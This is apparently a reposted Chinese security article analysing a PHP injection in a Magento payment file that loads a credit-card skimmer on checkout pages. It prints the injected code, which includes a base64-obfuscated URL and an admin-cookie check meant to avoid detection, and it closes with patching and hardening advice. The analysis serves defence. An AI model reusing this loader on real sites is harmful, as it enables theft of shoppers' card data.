Magento PHP注入加载JavaScript Skimmer

  • A+
所属分类:安全文章
点击上方蓝字关注我们


研究人员发现Magento电子商务网站的其中一个Magento文件中,包含PHP注入:./app/code/core/Mage/Payment/Model/Method/Cc.php


...if ($_SERVER["REQUEST_METHOD"] === "GET"){              if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){                  if(!isset($_COOKIE["adminhtml"])){                      echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));                  }              }          }


为了使其更难以被检测,该JavaScript skimmer使用了PHP函数file_get_contents进行加载,并对URL进行base64混淆。


作为附加的规避操作,该skimmer仅在满足以下两个条件时才会加载:


  • 访客在结帐页面上

  • 访客未以管理员用户身份登录到Magento网


该PHP代码通过在访问者请求的URI中,查找带有strpos的文本字符串“/onestepcheckout/index/”来检查是否在结账页面上。此外,它还会检查访问者是否具有adminhtml cookie,这将指示访问者是否以admin用户身份登录到Magento网站。



对于电子商务网站来说,信用卡skimmer是一个持续存在的问题。它们不仅对您的网站有严重影响,而且还使客户面临身份盗窃或信用卡欺诈的风险,最终可能导致PCI合规性问题。


而且,当恶意攻击者不断使用新的技术和规避手段更新其恶意软件时,电子商务网站更应积极的采取措施来保护其用户和收入流。


为了降低风险并防止感染,请在可用的最新安全修补程序可用后立即安装,并遵循网站强化指南,利用Web应用程序防火墙对所有已知漏洞进行修补。



END




好文!必须在看

本文始发于微信公众号(SecTr安全团队):Magento PHP注入加载JavaScript Skimmer

发表评论